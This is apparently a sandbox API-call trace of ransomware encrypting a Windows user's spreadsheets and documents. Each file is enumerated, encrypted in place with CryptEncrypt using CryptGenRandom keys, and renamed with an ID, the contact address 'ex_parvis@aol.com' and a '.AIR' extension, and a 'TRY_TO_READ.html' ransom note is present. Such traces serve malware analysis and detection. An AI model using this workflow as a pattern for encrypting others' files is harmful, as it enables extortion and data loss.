	[0106.073] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.073] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.073] WriteFile (in: hFile=0x514, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.074] WriteFile (in: hFile=0x514, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.074] WriteFile (in: hFile=0x514, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.074] ReadFile (in: hFile=0x514, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x9923, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x9923, lpOverlapped=0x0) returned 1
	[0106.075] SetFilePointer (in: hFile=0x514, lDistanceToMove=-39203, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.075] WriteFile (in: hFile=0x514, lpBuffer=0x6134e8*, nNumberOfBytesToWrite=0x9923, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x6134e8*, lpNumberOfBytesWritten=0x3a1f778*=0x9923, lpOverlapped=0x0) returned 1
	[0106.075] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16edf7e0, ftCreationTime.dwHighDateTime=0x1d4c712, ftLastAccessTime.dwLowDateTime=0xe630ad30, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe630ad30, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dadb0
	[0106.075] FindNextFileW (in: hFindFile=0x5dadb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x16edf7e0, ftCreationTime.dwHighDateTime=0x1d4c712, ftLastAccessTime.dwLowDateTime=0xe630ad30, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe630ad30, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0106.075] FindNextFileW (in: hFindFile=0x5dadb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bfa28e0, ftCreationTime.dwHighDateTime=0x1d4d135, ftLastAccessTime.dwLowDateTime=0x6a4938f0, ftLastAccessTime.dwHighDateTime=0x1d4d22a, ftLastWriteTime.dwLowDateTime=0x6a4938f0, ftLastWriteTime.dwHighDateTime=0x1d4d22a, nFileSizeHigh=0x0, nFileSizeLow=0xc3f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8kSjsxq29r-deEb.xlsx", cAlternateFileName="8KSJSX~1.XLS")) returned 1
	[0106.075] FindNextFileW (in: hFindFile=0x5dadb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd998c610, ftCreationTime.dwHighDateTime=0x1d4d1b9, ftLastAccessTime.dwLowDateTime=0x8c00c300, ftLastAccessTime.dwHighDateTime=0x1d4d0c2, ftLastWriteTime.dwLowDateTime=0x8c00c300, ftLastWriteTime.dwHighDateTime=0x1d4d0c2, nFileSizeHigh=0x0, nFileSizeLow=0x10d16, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HA3Qz1qB9zmIFARZS8e.ods", cAlternateFileName="HA3QZ1~1.ODS")) returned 1
	[0106.075] FindNextFileW (in: hFindFile=0x5dadb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54fd7b80, ftCreationTime.dwHighDateTime=0x1d4c74b, ftLastAccessTime.dwLowDateTime=0x52ddb9f0, ftLastAccessTime.dwHighDateTime=0x1d4d079, ftLastWriteTime.dwLowDateTime=0x52ddb9f0, ftLastWriteTime.dwHighDateTime=0x1d4d079, nFileSizeHigh=0x0, nFileSizeLow=0x18f8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j97ZvkQ0wGZu.xls", cAlternateFileName="J97ZVK~1.XLS")) returned 1
	[0106.075] FindNextFileW (in: hFindFile=0x5dadb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4464dfb0, ftCreationTime.dwHighDateTime=0x1d4c64d, ftLastAccessTime.dwLowDateTime=0xda1aebf0, ftLastAccessTime.dwHighDateTime=0x1d4c885, ftLastWriteTime.dwLowDateTime=0xda1aebf0, ftLastWriteTime.dwHighDateTime=0x1d4c885, nFileSizeHigh=0x0, nFileSizeLow=0x43d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lULCbHNB8.ots", cAlternateFileName="LULCBH~1.OTS")) returned 1
	[0106.075] FindNextFileW (in: hFindFile=0x5dadb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0fd4d70, ftCreationTime.dwHighDateTime=0x1d4d438, ftLastAccessTime.dwLowDateTime=0x3cdd8da0, ftLastAccessTime.dwHighDateTime=0x1d4cdbe, ftLastWriteTime.dwLowDateTime=0x3cdd8da0, ftLastWriteTime.dwHighDateTime=0x1d4cdbe, nFileSizeHigh=0x0, nFileSizeLow=0x8f56, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r7RzMA.xlsx", cAlternateFileName="R7RZMA~1.XLS")) returned 1
	[0106.076] FindNextFileW (in: hFindFile=0x5dadb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe630ad30, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe630ad30, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6330e90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0106.076] FindNextFileW (in: hFindFile=0x5dadb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97d9820, ftCreationTime.dwHighDateTime=0x1d4cb38, ftLastAccessTime.dwLowDateTime=0xa5c41710, ftLastAccessTime.dwHighDateTime=0x1d4d036, ftLastWriteTime.dwLowDateTime=0xa5c41710, ftLastWriteTime.dwHighDateTime=0x1d4d036, nFileSizeHigh=0x0, nFileSizeLow=0x1ac8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vb4GH5GK03C6Ryv.doc", cAlternateFileName="VB4GH5~1.DOC")) returned 1
	[0106.076] FindNextFileW (in: hFindFile=0x5dadb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97d9820, ftCreationTime.dwHighDateTime=0x1d4cb38, ftLastAccessTime.dwLowDateTime=0xa5c41710, ftLastAccessTime.dwHighDateTime=0x1d4d036, ftLastWriteTime.dwLowDateTime=0xa5c41710, ftLastWriteTime.dwHighDateTime=0x1d4d036, nFileSizeHigh=0x0, nFileSizeLow=0x1ac8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vb4GH5GK03C6Ryv.doc", cAlternateFileName="VB4GH5~1.DOC")) returned 0
	[0106.076] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.076] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.076] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\vb4GH5GK03C6Ryv.doc", dwFileAttributes=0x80) returned 1
	[0106.076] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\vb4GH5GK03C6Ryv.doc") returned 72
	[0106.076] GetProcessHeap () returned 0x540000
	[0106.076] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf6) returned 0x598b60
	[0106.076] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\vb4GH5GK03C6Ryv.doc" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\vb4GH5GK03C6Ryv.doc") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\vb4GH5GK03C6Ryv.doc"
	[0106.076] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\vb4GH5GK03C6Ryv.doc", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\vb4GH5GK03C6Ryv.doc.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\vb4GH5GK03C6Ryv.doc.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.076] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\vb4GH5GK03C6Ryv.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c jzw0ymnd6\\vb4gh5gk03c6ryv.doc"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\vb4GH5GK03C6Ryv.doc.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c jzw0ymnd6\\vb4gh5gk03c6ryv.doc.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.081] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\vb4GH5GK03C6Ryv.doc.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c jzw0ymnd6\\vb4gh5gk03c6ryv.doc.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x518
	[0106.081] GetProcessHeap () returned 0x540000
	[0106.081] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.081] GetFileSizeEx (in: hFile=0x518, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=6856) returned 1
	[0106.081] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1ac8
	[0106.081] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.081] GetProcessHeap () returned 0x540000
	[0106.081] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.081] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.081] WriteFile (in: hFile=0x518, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.082] WriteFile (in: hFile=0x518, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.082] WriteFile (in: hFile=0x518, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.082] ReadFile (in: hFile=0x518, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x1ac8, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x1ac8, lpOverlapped=0x0) returned 1
	[0106.082] SetFilePointer (in: hFile=0x518, lDistanceToMove=-6856, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.082] WriteFile (in: hFile=0x518, lpBuffer=0x60b688*, nNumberOfBytesToWrite=0x1ac8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60b688*, lpNumberOfBytesWritten=0x3a1f778*=0x1ac8, lpOverlapped=0x0) returned 1
	[0106.083] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.083] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.083] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\r7RzMA.xlsx", dwFileAttributes=0x80) returned 1
	[0106.083] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\r7RzMA.xlsx") returned 64
	[0106.083] GetProcessHeap () returned 0x540000
	[0106.083] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe6) returned 0x57fb28
	[0106.083] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\r7RzMA.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\r7RzMA.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\r7RzMA.xlsx"
	[0106.083] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\r7RzMA.xlsx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\r7RzMA.xlsx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\r7RzMA.xlsx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.083] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\r7RzMA.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c jzw0ymnd6\\r7rzma.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\r7RzMA.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c jzw0ymnd6\\r7rzma.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.086] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\r7RzMA.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c jzw0ymnd6\\r7rzma.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x518
	[0106.086] GetProcessHeap () returned 0x540000
	[0106.086] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0106.086] GetFileSizeEx (in: hFile=0x518, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=36694) returned 1
	[0106.086] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x8f56
	[0106.086] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.086] GetProcessHeap () returned 0x540000
	[0106.086] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.086] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.086] WriteFile (in: hFile=0x518, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.087] WriteFile (in: hFile=0x518, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.087] WriteFile (in: hFile=0x518, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.087] ReadFile (in: hFile=0x518, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x8f56, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x8f56, lpOverlapped=0x0) returned 1
	[0106.088] SetFilePointer (in: hFile=0x518, lDistanceToMove=-36694, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.088] WriteFile (in: hFile=0x518, lpBuffer=0x612b18*, nNumberOfBytesToWrite=0x8f56, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x612b18*, lpNumberOfBytesWritten=0x3a1f778*=0x8f56, lpOverlapped=0x0) returned 1
	[0106.088] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.088] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.088] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\lULCbHNB8.ots", dwFileAttributes=0x80) returned 1
	[0106.088] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\lULCbHNB8.ots") returned 66
	[0106.088] GetProcessHeap () returned 0x540000
	[0106.088] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xea) returned 0x598b60
	[0106.088] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\lULCbHNB8.ots" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\lULCbHNB8.ots") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\lULCbHNB8.ots"
	[0106.088] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\lULCbHNB8.ots", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\lULCbHNB8.ots.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\lULCbHNB8.ots.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.088] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\lULCbHNB8.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c jzw0ymnd6\\lulcbhnb8.ots"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\lULCbHNB8.ots.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c jzw0ymnd6\\lulcbhnb8.ots.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.090] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\lULCbHNB8.ots.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c jzw0ymnd6\\lulcbhnb8.ots.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x518
	[0106.090] GetProcessHeap () returned 0x540000
	[0106.091] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.091] GetFileSizeEx (in: hFile=0x518, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=17368) returned 1
	[0106.091] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x43d8
	[0106.091] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.091] GetProcessHeap () returned 0x540000
	[0106.091] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.091] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.091] WriteFile (in: hFile=0x518, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.092] WriteFile (in: hFile=0x518, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.092] WriteFile (in: hFile=0x518, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.092] ReadFile (in: hFile=0x518, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x43d8, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x43d8, lpOverlapped=0x0) returned 1
	[0106.092] SetFilePointer (in: hFile=0x518, lDistanceToMove=-17368, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.092] WriteFile (in: hFile=0x518, lpBuffer=0x60df98*, nNumberOfBytesToWrite=0x43d8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60df98*, lpNumberOfBytesWritten=0x3a1f778*=0x43d8, lpOverlapped=0x0) returned 1
	[0106.092] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.092] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.092] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\j97ZvkQ0wGZu.xls", dwFileAttributes=0x80) returned 1
	[0106.093] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\j97ZvkQ0wGZu.xls") returned 69
	[0106.093] GetProcessHeap () returned 0x540000
	[0106.093] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf0) returned 0x598b60
	[0106.093] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\j97ZvkQ0wGZu.xls" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\j97ZvkQ0wGZu.xls") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\j97ZvkQ0wGZu.xls"
	[0106.093] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\j97ZvkQ0wGZu.xls", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\j97ZvkQ0wGZu.xls.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\j97ZvkQ0wGZu.xls.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.093] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\j97ZvkQ0wGZu.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c jzw0ymnd6\\j97zvkq0wgzu.xls"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\j97ZvkQ0wGZu.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c jzw0ymnd6\\j97zvkq0wgzu.xls.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
